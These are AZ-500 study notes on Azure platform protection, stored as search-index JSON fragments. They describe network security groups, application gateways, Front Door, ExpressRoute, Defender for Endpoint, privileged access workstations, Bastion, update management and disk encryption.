        NSGs control inbound and outbound traffic passing through a network adapter (in the Resource Manager deployment model), a VM (in the classic deployment model), or a subnet (in both deployment models).

        Network Security Group rules

        • Name. This is a unique identifier for the rule.
        • Direction. This specifies whether the traffic is inbound or outbound.
        • Priority. If multiple rules match the traffic, rules with a higher priority apply.
        • Access. This specifies whether the traffic is allowed or denied.
        • Source IP address prefix. This prefix identifies where the traffic originated from. It can be based on a single IP address; a range of IP addresses in Classless Interdomain Routing (CIDR) notation; or the asterisk (*), which is a wildcard that matches all possible IP addresses.
        • Source port range. This specifies source ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
        • Destination IP address prefix. This identifies the traffic destination based on a single IP address, a range of IP addresses in CIDR notation, or the asterisk (*) to match all possible IP addresses.
        • Destination port range. This specifies destination ports by using either a single port number from 1 through 65,535; a range of ports (for example, 200\u2013400); or the asterisk (*) to denote all possible ports.
        • Protocol. This specifies a protocol that matches the rule. It can be UDP, TCP, or the asterisk (*).

        Predefined default rules exist for inbound and outbound traffic. You can\u2019t delete these rules, but you can override them, because they have the lowest priority.

        The default rules allow all inbound and outbound traffic within a virtual network, allow outbound traffic towards the internet, and allow inbound traffic to an Azure load balancer.

        When you create a custom rule, you can use default tags in the source and destination IP address prefixes to specify predefined categories of IP addresses. These default tags are:

        • Internet. This tag represents internet IP addresses.
        • Virtual_network. This tag identifies all IP addresses that the IP range for the virtual network defines. It also includes IP address ranges from on-premises networks when they are defined as local network to virtual network.
        • Azure_loadbalancer. This tag specifies the default Azure load balancer destination.

        You can design NSGs to isolate virtual networks in security zones, like the model used by on-premises infrastructure does. You can apply NSGs to subnets, which allows you to create protected screened subnets, or DMZs, that can restrict traffic flow to all the machines residing within that subnet. With the classic deployment model, you can also assign NSGs to individual computers to control traffic that is both destined for and leaving the VM. With the Resource Manager deployment model, you can assign NSGs to a network adapter so that NSG rules control only the traffic that flows through that network adapter. If the VM has multiple network adapters, NSG rules won\u2019t automatically be applied to traffic that is designated for other network adapters.

        Network Security Group limitations

        When implementing NSGs, these are the limits to keep in mind:

        • By default, you can create 100 NSGs per region per subscription. You can raise this limit to 400 by contacting Azure support.
        • You can apply only one NSG to a VM, subnet, or network adapter.
        • By default, you can have up to 200 rules in a single NSG. You can raise this limit to 500 by contacting Azure support.
        • You can apply an NSG to multiple resources.

        An individual subnet can have zero, or one, associated NSG. An individual network interface can also have zero, or one, associated NSG. So, you can effectively have dual traffic restriction for a virtual machine by associating an NSG first to a subnet, and then another NSG to the VM's network interface.

        Consider a simple example with one virtual machine as follows:

        • The virtual machine is placed inside the Contoso Subnet.
        • Contoso Subnet is associated with Subnet NSG.
        • The VM network interface is additionally associated with VM NSG.

        In this example, for inbound traffic, the Subnet NSG is evaluated first. Any traffic allowed through Subnet NSG is then evaluated by VM NSG. The reverse is applicable for outbound traffic, with VM NSG being evaluated first. Any traffic allowed through VM NSG is then evaluated by Subnet NSG.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#22-application-security-groups","title":"2.2. Application Security Groups","text":"

        In this topic we look at Application Security Groups (ASGs), which are built on network security groups. ASGs enable you to configure network security as a natural extension of an application's structure. You then can group VMs and define network security policies based on those groups.

        The rules that specify an ASG as the source or destination are only applied to the network interfaces that are members of the ASG. If the network interface is not a member of an ASG, the rule is not applied to the network interface even though the network security group is associated to the subnet.

        Application security groups have the following constraints

        • There are limits to the number of ASGs you can have in a subscription, in addition to other limits related to ASGs.
        • You can specify one ASG as the source and destination in a security rule. You cannot specify multiple ASGs in the source or destination.
        • All network interfaces assigned to an ASG must exist in the same virtual network that the first network interface assigned to the ASG is in. For example, if the first network interface assigned to an ASG named AsgWeb is in the virtual network named VNet1, then all subsequent network interfaces assigned to ASGWeb must exist in VNet1. You cannot add network interfaces from different virtual networks to the same ASG.
        • If you specify an ASG as the source and destination in a security rule, the network interfaces in both ASGs must exist in the same virtual network. For example, if AsgLogic contained network interfaces from VNet1, and AsgDb contained network interfaces from VNet2, you could not assign AsgLogic as the source and AsgDb as the destination in a rule. All network interfaces for both the source and destination ASGs need to exist in the same virtual network.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#23-service-endpoints","title":"2.3. Service Endpoints","text":"

        A virtual network service endpoint provides the identity of your virtual network to the Azure service. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources.

        Today, Azure service traffic from a virtual network uses public IP addresses as source IP addresses. With service endpoints, service traffic switches to use virtual network private addresses as the source IP addresses when accessing the Azure service from a virtual network. This switch allows you to access the services without the need for reserved, public IP addresses used in IP firewalls.

        Why use a service endpoint?

        • Improved security for your Azure service resources. Once service endpoints are enabled in your virtual network, you can secure Azure service resources to your virtual network by adding a virtual network rule to the resources. This provides improved security by fully removing public Internet access to resources, and allowing traffic only from your virtual network.
        • Optimal routing for Azure service traffic from your virtual network. Today, any routes in your virtual network that force Internet traffic to your premises and/or virtual appliances, known as forced-tunneling, also force Azure service traffic to take the same route as the Internet traffic. Service endpoints provide optimal routing for Azure traffic.
        • Endpoints always take service traffic directly from your virtual network to the service on the Microsoft Azure backbone network. Keeping traffic on the Azure backbone network allows you to continue auditing and monitoring outbound Internet traffic from your virtual networks, through forced-tunneling, without impacting service traffic.
        • Simple to set up with less management overhead. You no longer need reserved, public IP addresses in your virtual networks to secure Azure resources through IP firewall. There are no NAT or gateway devices required to set up the service endpoints. Service endpoints are configured through a simple click on a subnet. There is no additional overhead to maintaining the endpoints.

        Scenarios

        • Peered, connected, or multiple virtual networks: To secure Azure services to multiple subnets within a virtual network or across multiple virtual networks, you can enable service endpoints on each of the subnets independently, and secure Azure service resources to all of the subnets.
        • Filtering outbound traffic from a virtual network to Azure services: If you want to inspect or filter the traffic sent to an Azure service from a virtual network, you can deploy a network virtual appliance within the virtual network. You can then apply service endpoints to the subnet where the network virtual appliance is deployed, and secure Azure service resources only to this subnet. This scenario might be helpful if you want use network virtual appliance filtering to restrict Azure service access from your virtual network only to specific Azure resources.
        • Securing Azure resources to services deployed directly into virtual networks: You can directly deploy various Azure services into specific subnets in a virtual network. You can secure Azure service resources to managed service subnets by setting up a service endpoint on the managed service subnet.
        • Disk traffic from an Azure virtual machine: Virtual Machine Disk traffic for managed and unmanaged disks isn't affected by service endpoints routing changes for Azure Storage. This traffic includes diskIO as well as mount and unmount. You can limit REST access to page blobs to select networks through service endpoints and Azure Storage network rules.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#24-private-links","title":"2.4. Private links","text":"

        Azure Private Link works on an approval call flow model wherein the Private Link service consumer can request a connection to the service provider for consuming the service. The service provider can then decide whether to allow the consumer to connect or not. Azure Private Link enables the service providers to manage the private endpoint connection on their resources

        There are two connection approval methods that a Private Link service consumer can choose from:

        • Automatic: If the service consumer has RBAC permissions on the service provider resource, the consumer can choose the automatic approval method. In this case, when the request reaches the service provider resource, no action is required from the service provider and the connection is automatically approved.
        • Manual: On the contrary, if the service consumer doesn\u2019t have RBAC permissions on the service provider resource, the consumer can choose the manual approval method. In this case, the connection request appears on the service resources as Pending. The service provider has to manually approve the request before connections can be established. In manual cases, service consumer can also specify a message with the request to provide more context to the service provider.

        he service provider has following options to choose from for all Private Endpoint connections:

        • Approved
        • Reject
        • Remove

        Portal is the preferred method for managing private endpoint connections on Azure PaaS resources.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#25-azure-application-gateway","title":"2.5. Azure application gateway","text":"

        Azure Application Gateway is a web traffic load balancer that enables you to manage traffic to your web applications. Traditional load balancers operate at the transport layer (OSI layer 4 - TCP and UDP) and route traffic based on the source IP address and port to a destination IP address and port.

        Application Gateway can make routing decisions based on additional attributes of an HTTP request, for example, URI path or host headers. \u00a0For example, you can route traffic based on the incoming URL. So if /images are in the incoming URL, you can route traffic to a specific set of servers (known as a pool) configured for images. If /video is in the URL, that traffic is routed to another pool that's optimized for videos. This type of routing is known as application layer (OSI layer 7) load balancing.

        Application Gateway includes the following features:

        • Secure Sockets Layer (SSL/TLS) termination\u00a0- Application gateway supports SSL/TLS termination at the gateway, after which traffic typically flows unencrypted to the backend servers. This feature allows web servers to be unburdened from costly encryption and decryption overhead.
        • Autoscaling\u00a0- Application Gateway Standard_v2 supports autoscaling and can scale up or down based on changing traffic load patterns. Autoscaling also removes the requirement to choose a deployment size or instance count during provisioning.
        • Zone redundancy\u00a0- A Standard_v2 Application Gateway can span multiple Availability Zones, offering better fault resiliency and removing the need to provision separate Application Gateways in each zone.
        • Static VIP\u00a0- The application gateway Standard_v2 SKU supports static VIP type exclusively. This ensures that the VIP associated with application gateway doesn't change even over the lifetime of the Application Gateway.
        • Web Application Firewall\u00a0- Web Application Firewall (WAF) is a service that provides centralized protection of your web applications from common exploits and vulnerabilities. WAF is based on rules from the OWASP (Open Web Application Security Project) core rule sets 3.1 (WAF_v2 only), 3.0, and 2.2.9.
        • Ingress Controller for AKS\u00a0- Application Gateway Ingress Controller (AGIC) allows you to use Application Gateway as the ingress for an Azure Kubernetes Service (AKS) cluster.
        • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to back-end server pools based on URL Paths of the request. One of the scenarios is to route requests for different content types to different pool.
        • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same application gateway instance. This feature allows you to configure a more efficient topology for your deployments by adding up to 100 web sites to one Application Gateway (for optimal performance).
        • Redirection\u00a0- A common scenario for many web applications is to support automatic HTTP to HTTPS redirection to ensure all communication between an application and its users occurs over an encrypted path.
        • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same server.
        • Websocket and HTTP/2 traffic\u00a0- Application Gateway provides native support for the WebSocket and HTTP/2 protocols. There's no user-configurable setting to selectively enable or disable WebSocket support.
        • Connection draining\u00a0- Connection draining helps you achieve graceful removal of backend pool members during planned service updates.
        • Custom error pages\u00a0- Application Gateway allows you to create custom error pages instead of displaying default error pages. You can use your own branding and layout using a custom error page.
        • Rewrite HTTP headers\u00a0- HTTP headers allow the client and server to pass additional information with the request or the response.
        • Sizing\u00a0- Application Gateway Standard_v2 can be configured for autoscaling or fixed size deployments. This SKU doesn't offer different instance sizes.

        New Application Gateway v1 SKU deployments can take up to 20 minutes to provision. Changes to instance size or count aren't disruptive, and the gateway remains active during this time.

        Most deployments that use the v2 SKU take around 6 minutes to provision. However it can take longer depending on the type of deployment. For example, deployments across multiple Availability Zones with many instances can take more than 6 minutes.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#26-web-application-firewall","title":"2.6. Web Application Firewall","text":"

        Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. Web applications are increasingly targeted by malicious attacks that exploit commonly known vulnerabilities. SQL injection and cross-site scripting are among the most common attacks.

        WAF can be deployed with Azure Application Gateway, Azure Front Door, and Azure Content Delivery Network (CDN) service from Microsoft. WAF on Azure CDN is currently under public preview. WAF has features that are customized for each specific service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#27-azure-front-door","title":"2.7. Azure Front Door","text":"

        Azure Front Door enables you to define, manage, and monitor the global routing for your web traffic by optimizing for best performance and instant global failover for high availability. With Front Door, you can transform your global (multi-region) consumer and enterprise applications into robust, high-performance personalized modern applications, APIs, and content that reaches a global audience with Azure.

        Front Door works at Layer 7 or HTTP/HTTPS layer and uses\u00a0split TCP-based anycast protocol.

        The following features are included with Front Door:

        • Accelerate application performance\u00a0- Using split TCP-based anycast protocol, Front Door ensures that your end users promptly connect to the nearest Front Door POP (Point of Presence).
        • Increase application availability with smart health probes\u00a0- Front Door delivers high availability for your critical applications using its smart health probes, monitoring your backends for both latency and availability and providing instant automatic failover when a backend goes down.
        • URL-based routing\u00a0- URL Path Based Routing allows you to route traffic to backend pools based on URL paths of the request. One of the scenarios is to route requests for different content types to different backend pools.
        • Multiple-site hosting\u00a0- Multiple-site hosting enables you to configure more than one web site on the same Front Door configuration.
        • Session affinity\u00a0- The cookie-based session affinity feature is useful when you want to keep a user session on the same application backend.
        • TLS termination\u00a0- Front Door supports TLS termination at the edge that is, individual users can set up a TLS connection with Front Door environments instead of establishing it over long haul connections with the application backend.
        • Custom domains and certificate management\u00a0- When you use Front Door to deliver content, a custom domain is necessary if you would like your own domain name to be visible in your Front Door URL.
        • Application layer security\u00a0- Azure Front Door allows you to author custom Web Application Firewall (WAF) rules for access control to protect your HTTP/HTTPS workload from exploitation based on client IP addresses, country code, and http parameters.
        • URL redirection\u00a0- With the strong industry push on supporting only secure communication, web applications are expected to automatically redirect any HTTP traffic to HTTPS.
        • URL rewrite\u00a0- Front Door supports URL rewrite by allowing you to configure an optional Custom Forwarding Path to use when constructing the request to forward to the backend.
        • Protocol support - IPv6 and HTTP/2 traffic\u00a0- Azure Front Door natively supports end-to-end IPv6 connectivity and HTTP/2 protocol.

        As mentioned above, routing to the Azure Front Door environments leverages Anycast for both DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) traffic, so user traffic will go to the closest environment in terms of network topology (fewest hops). This architecture typically offers better round-trip times for end users (maximizing the benefits of Split TCP). Front Door organizes its environments into primary and fallback \"rings\". The outer ring has environments that are closer to users, offering lower latencies. The inner ring has environments that can handle the failover for the outer ring environment in case an issue happens. The outer ring is the preferred target for all traffic, but the inner ring is necessary to handle traffic overflow from the outer ring. In terms of VIPs (Virtual Internet Protocol addresses), each frontend host, or domain served by Front Door is assigned a primary VIP, which is announced by environments in both the inner and outer ring, as well as a fallback VIP, which is only announced by environments in the inner ring.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#28-expressroute","title":"2.8. ExpressRoute","text":"

        ExpressRoute\u00a0is a direct, private connection from your WAN (not over the public Internet) to Microsoft Services, including Azure. Site-to-Site VPN traffic travels encrypted over the public Internet. Being able to configure Site-to-Site VPN and ExpressRoute connections for the same virtual network has several advantages.

        You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute, or use Site-to-Site VPNs to connect to sites that are not part of your network, but that are connected through ExpressRoute. Notice that this configuration requires two virtual network gateways for the same virtual network, one using the gateway type 'Vpn', and the other using the gateway type 'ExpressRoute'.

        IPsec over ExpressRoute for Virtual WAN

        Azure Virtual WAN uses an Internet Protocol Security (IPsec) Internet Key Exchange (IKE) VPN connection from your on-premises network to Azure over the private peering of an Azure ExpressRoute circuit. This technique can provide an encrypted transit between the on-premises networks and Azure virtual networks over ExpressRoute, without going over the public internet or using public IP addresses. The following diagram shows an example of VPN connectivity over ExpressRoute private peering.

        An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths. An important aspect of this configuration is routing between the on-premises networks and Azure over both the ExpressRoute and VPN paths.

        Point-to-point encryption by MACsec -. MACsec is an IEEE standard. It encrypts data at the Media Access control (MAC) level or Network Layer 2. You can use MACsec to encrypt the physical links between your network devices and Microsoft's network devices when you connect to Microsoft via ExpressRoute Direct. MACsec is disabled on ExpressRoute Direct ports by default. You bring your own MACsec key for encryption and store it in Azure Key Vault. You decide when to rotate the key.

        End-to-end encryption by IPsec and MACsec. - IPsec is an IETF standard. It encrypts data at the Internet Protocol (IP) level or Network Layer 3. You can use IPsec to encrypt an end-to-end connection between your on-premises network and your virtual network (VNET) on Azure. MACsec secures the physical connections between you and Microsoft. IPsec secures the end-to-end connection between you and your virtual networks on Azure. You can enable them independently.

        ExpressRoute Direct gives you the ability to connect directly into Microsoft\u2019s global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100 Gbps or 10 Gbps connectivity, which supports Active/Active connectivity at scale

        Key features that ExpressRoute Direct provides include, but aren't limited to:

        • Massive Data Ingestion into services like Storage and Cosmos DB
        • Physical isolation for industries that are regulated and require dedicated and isolated connectivity like: Banking, Government, and Retail
        • Granular control of circuit distribution based on business unit

        ExpressRoute Direct supports massive data ingestion scenarios into Azure storage and other big data services. ExpressRoute circuits on 100 Gbps ExpressRoute Direct now also support 40 Gbps and 100 Gbps circuit SKUs. The physical port pairs are 100 or 10 Gbps only and can have multiple virtual circuits.

        ExpressRoute Direct supports both QinQ and Dot1Q VLAN tagging.

        • QinQ VLAN Tagging\u00a0allows for isolated routing domains on a per ExpressRoute circuit basis. Azure dynamically allocates an S-Tag at circuit creation and cannot be changed. Each peering on the circuit (Private and Microsoft) will utilize a unique C-Tag as the VLAN. The C-Tag is not required to be unique across circuits on the ExpressRoute Direct ports.
        • Dot1Q VLAN Tagging\u00a0allows for a single tagged VLAN on a per ExpressRoute Direct port pair basis. A C-Tag used on a peering must be unique across all circuits and peerings on the ExpressRoute Direct port pair.

        ExpressRoute Direct provides the same enterprise-grade SLA with Active/Active redundant connections into the Microsoft Global Network. ExpressRoute infrastructure is redundant and connectivity into the Microsoft Global Network is redundant and diverse and scales accordingly with customer requirements.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#3-host-security","title":"3. Host security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#31-endpoint-protection","title":"3.1. Endpoint protection","text":"

        Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.

        The capabilities on non-Windows platforms may be different from the ones for Windows.

        Defender for Endpoint uses the following combination of technology built into Windows 10 and Microsoft's robust cloud service:

        • Endpoint behavioral sensors: Embedded in Windows 10, these sensors collect and process behavioral signals from the operating system and send this sensor data to your private, isolated cloud instance of Microsoft Defender for Endpoint.
        • Cloud security analytics: Leveraging big data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Office 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.
        • Threat intelligence: Generated by Microsoft hunters, security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures and generate alerts when they are observed in collected sensor data.

        Some features of Microsoft Defender for Endpoint:

        Core Defender Vulnerability Management - Built-in core vulnerability management capabilities use a modern risk-based approach to the discovery, assessment, prioritization, and remediation of endpoint vulnerabilities and misconfigurations.

        Attack surface reduction - The attack surface reduction set of capabilities provides the first line of defense in the stack. By ensuring configuration settings are properly set and exploit mitigation techniques are applied, the capabilities resist attacks and exploitation. This set of capabilities also includes network protection and web protection, which regulate access to malicious IP addresses, domains, and URLs.

        Next-generation protection - To further reinforce the security perimeter of your network, Microsoft Defender for Endpoint uses next-generation protection designed to catch all types of emerging threats.

        Endpoint detection and response - Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars. Advanced hunting provides a query-based threat-hunting tool that lets you proactively find breaches and create custom detections.

        Automated investigation and remediation - In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

        Microsoft Secure Score for Devices - Defender for Endpoint includes Microsoft Secure Score for Devices to help you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.

        Microsoft Threat Experts - Microsoft Defender for Endpoint's new managed threat hunting service provides proactive hunting, prioritization, and additional context and insights that further empower Security operation centers (SOCs) to identify and respond to threats quickly and accurately.

        Defender for Endpoint customers need to apply for the Microsoft Threat Experts managed threat hunting service to get proactive Targeted Attack Notifications and to collaborate with experts on demand.

        Centralized configuration and administration, APIs - Integrate Microsoft Defender for Endpoint into your existing workflows.

        Integration with Microsoft solutions - Defender for Endpoint directly integrates with various Microsoft solutions, including:

        • Microsoft Defender for Cloud
        • Microsoft Sentinel
        • Intune
        • Microsoft Defender for Cloud Apps
        • Microsoft Defender for Identity
        • Microsoft Defender for Office
        • Skype for Business

        Microsoft 365 Defender - With Microsoft 365 Defender, Defender for Endpoint, and various Microsoft security solutions, form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attack

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#32-privileged-access-device","title":"3.2. Privileged Access Device","text":"

        Zero Trust, means that you don't purchase from generic retailers but only supply hardware from an authorized OEM that support Autopilot.

        For this solution, root of trust will be deployed using Windows Autopilot technology with hardware that meets the modern technical requirements. To secure a workstation, Autopilot lets you leverage Microsoft OEM-optimized Windows 10 devices. These devices come in a known good state from the manufacturer. Instead of reimaging a potentially insecure device, Autopilot can transform a Windows 10 device into a \u201cbusiness-ready\u201d state. It applies settings and policies, installs apps, and even changes the edition of Windows 10.

        To have a secured workstation you need to make sure the following security technologies are included on the device:

        • Trusted Platform Module (TPM) 2.0
        • BitLocker Drive Encryption
        • UEFI Secure Boot
        • Drivers and Firmware Distributed through Windows Update
        • Virtualization and HVCI Enabled
        • Drivers and Apps HVCI-Ready
        • Windows Hello
        • DMA I/O Protection
        • System Guard
        • Modern Standby

        Levels of device security

        Device Type Common usage scenario Permitted activities Security guidance Enterprise Device Home users, small business users, general purpose developers, and enterprise Run any application, browse any website Anti-malware and virus protection and policy based security posture for the enterprise. Specialized Device Specialized or secure enterprise users Run approved applications, but cannot install apps. Email and web browsing allowed. No admin controls No self administration of device, no application installation, policy based security, and endpoint management Privileged Device Extremely sensitive roles IT Operations No local admins, no productivity tools, locked down browsing. PAW device

        This chart shows the level of device security controls based on how the device will be used.

        A secure workstation requires it be part of an end-to-end approach including device security, account security, and security policies applied to the device at all times. Here are some common security measures you should consider implementing based on the users' needs.

        Security Control Enterprise Device Specialized Device Privileged Device Microsoft Endpoint Manager (MEM) managed Yes Yes Yes Deny BYOD Device enrollment No Yes Yes MEM security baseline applied Yes Yes Yes Microsoft Defender for Endpoint Yes Yes Yes Join personal device via Autopilot Yes Yes No URLs restricted to approved list Allow Most Allow Most Deny Default Removal of admin rights Yes Yes Application execution control (AppLocker) Audit -> Enforced Yes Applications installed only by MEM Yes Yes","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#33-privileged-access-workstations-paw-workstations","title":"3.3. Privileged Access Workstations (PAW workstations)","text":"

        PAW is a hardened and locked down workstation designed to provide high security assurances for sensitive accounts and tasks. PAWs are recommended for administration of identity systems, cloud services, and private cloud fabric as well as sensitive business functions. In order to provide the greatest security, PAWs should always run the most up-to-date and secure operating system available: Microsoft strongly recommends Windows 10 Enterprise, which includes several additional security features not available in other editions (in particular, Credential Guard and Device Guard).

        • Internet attacks\u00a0- Isolating the PAW from the open internet is a key element to ensuring the PAW is not compromised.
        • Usability risk\u00a0- If a PAW is too difficult to use for daily tasks, administrators will be motivated to create workarounds to make their jobs easier.
        • Environment risks\u00a0- Minimizing the use of management tools and accounts that have access to the PAWs to secure and monitor these specialized workstations.
        • Supply chain tampering\u00a0- Taking a few key actions can mitigate critical attack vectors that are readily available to attackers. This includes validating the integrity of all installation media (Clean Source Principle) and using a trusted and reputable supplier for hardware and software.
        • Physical attacks\u00a0- Because PAWs can be physically mobile and used outside of physically secure facilities, they must be protected against attacks that leverage unauthorized physical access to the computer.

        This methodology is appropriate for accounts with access to high value assets:

        • Administrative Privileges\u00a0- PAWs provide increased security for high impact IT administrative roles and tasks. This architecture can be applied to administration of many types of systems including Active Directory Domains and Forests, Microsoft Entra tenants, Microsoft 365 tenants, Process Control Networks (PCN), Supervisory Control and Data Acquisition (SCADA) systems, Automated Teller Machines (ATMs), and Point of Sale (PoS) devices.
        • High Sensitivity Information workers\u00a0- The approach used in a PAW can also provide protection for highly sensitive information worker tasks and personnel such as those involving pre-announcement Merger and Acquisition activity, pre-release financial reports, organizational social media presence, executive communications, unpatented trade secrets, sensitive research, or other proprietary or sensitive data. This guidance does not discuss the configuration of these information worker scenarios in depth or include this scenario in the technical instructions.

        Administrative \"Jump Box\" architectures set up a small number administrative console servers and restrict personnel to using them for administrative tasks. This is typically based on remote desktop services, a 3rd-party presentation virtualization solution, or a Virtual Desktop Infrastructure (VDI) technology.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#34-virtual-machine-templates","title":"3.4. Virtual Machine templates","text":"

        Here are some additional terms to know when using Resource Manager:

        • Resource provider. A service that supplies Azure resources. For example, a common resource provider is Microsoft.Compute, which supplies the VM resource. Microsoft.Storage is another common resource provider.
        • Resource Manager template. A JSON file that defines one or more resources to deploy to a resource group or subscription. You can use the template to consistently and repeatedly deploy the resources.
        • Declarative syntax. Syntax that lets you state, \"Here\u2019s what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.

        When you deploy a template, Resource Manager converts the template into REST API operations.

        Here two different deployment schemas with same result:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#35-remote-access-management-rdp-ssh-and-azure-bastion","title":"3.5. Remote Access Management: RDP, ssh, and Azure Bastion","text":"

        This topic explains how to connect to and sign into the virtual machines (VMs) you created on Azure. Once you've successfully connected, you can work with the VM as if you were locally logged on to its host server.

        Connect to a Windows VM - With rdp, with ssh or with Azure Bastion Service. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. The Azure Bastion service is a fully platform-managed PaaS service that you provision inside your virtual network. It provides secure and seamless RDP/SSH connectivity to your virtual machines directly in the Azure portal over TLS. Bastion provides secure RDP and SSH connectivity to all the VMs in the virtual network in which it is provisioned. Using Azure Bastion protects your virtual machines from exposing RDP/SSH ports to the outside world, while still providing secure access using RDP/SSH. With Azure Bastion, you connect to the virtual machine directly from the Azure portal.

        Benefits of Bastion

        You can deploy bastion hosts (also known as jump-servers) at the public side of your perimeter network. Bastion host servers are designed and configured to withstand attacks. Bastion servers also provide RDP and SSH connectivity to the workloads sitting behind the bastion, as well as further inside the network.

        No hassle of managing NSGs: Azure Bastion is a fully managed platform PaaS service from Azure that is hardened internally to provide you secure RDP/SSH connectivity. You don't need to apply any NSGs on Azure Bastion subnet. Because Azure Bastion connects to your virtual machines over private IP, you can configure your NSGs to allow RDP/SSH from Azure Bastion only.

        Protection against port scanning: Because you do not need to expose your virtual machines to public Internet, your VMs are protected against port scanning by rogue and malicious users located outside your virtual network.

        Protect against zero-day exploits. Hardening in one place only: Azure Bastion is a fully platform-managed PaaS service. Because it sits at the perimeter of your virtual network, you don\u2019t need to worry about hardening each of the virtual machines in your virtual network.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#36-update-management","title":"3.6. Update Management","text":"

        Azure Update Management is a service included as part of your Azure subscription. With Update Management, you can assess your update status across your environment and manage your Windows Server and Linux server updates from a single location\u2014for both your on-premises and Azure environments.

        Update Management is available at no additional cost (you pay only for the log data that Azure Log Analytics stores), and you can easily enable it for Azure and on-premises VMs. \u00a0You can also enable Update Management for VMs directly from your Azure Automation account.

        Configurations on managed computers:

        • Microsoft Monitoring Agent (MMA) for Windows or Linux.
        • Desired State Configuration (DSC) in Windows PowerShell for Linux.
        • Hybrid Runbook Worker in Azure Automation.
        • Microsoft Update or Windows Server Update Services (WSUS) for Windows computers.

        Azure Automation uses runbooks to install updates. When an update deployment is created, it creates a schedule that starts a master update runbook at the specified time for the included computers. The master runbook starts a child runbook on each agent to install the required updates.

        The Log Analytics agent for Windows and Linux needs to be installed on the VMs that are running on your corporate network or other cloud environment in order to enable them with Update Management.

        From your Azure Automation account, you can:

        • Onboard virtual machines
        • Assess the status of available updates
        • Schedule installation of required updates
        • Review deployment results to verify that updates were applied successfully to all virtual machines for which Update Management is enabled

        Azure Update Management provides the ability to deploy patches based on classifications. However, there are scenarios where you may want to explicitly list the exact set of patches. With update inclusion lists you can choose exactly which patches you want to deploy instead of relying on patch classifications.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#37-disk-encryption","title":"3.7. Disk encryption","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#windows","title":"WINDOWS","text":"

        Azure Disk Encryption for Windows VMs\u00a0helps protect and safeguard your data to meet your organizational security and compliance commitments. It uses the BitLocker feature of Windows to provide volume encryption for the OS and data disks of Azure virtual machines (VMs), and is integrated with Azure Key Vault to help you control and manage the disk encryption keys and secrets. Azure Disk Encryption is zone resilient, the same way as Virtual Machines.

        Supported VMs. - Azure Disk Encryption is supported on Generation 1 and Generation 2 VMs. Azure Disk Encryption is also available for VMs with premium storage. Azure Disk Encryption is not available on Basic, A-series VMs, or on virtual machines with less than 2 GB of memory.

        Supported operating systems. - - Windows client: Windows 8 and later. - Windows Server: Windows Server 2008 R2 and later. - Windows 10 Enterprise multi-session.

        To enable Azure Disk Encryption, the VMs must meet the following network endpoint configuration requirements:

        • To get a token to connect to your key vault, the Windows VM must be able to connect to a Microsoft Entra endpoint, [login.microsoftonline.com].
        • To write the encryption keys to your key vault, the Windows VM must be able to connect to the key vault endpoint.
        • The Windows VM must be able to connect to an Azure storage endpoint that hosts the Azure extension repository and an Azure storage account that hosts the VHD files.
        • If your security policy limits access from Azure VMs to the Internet, you can resolve the preceding URI and configure a specific rule to allow outbound connectivity to the IPs.

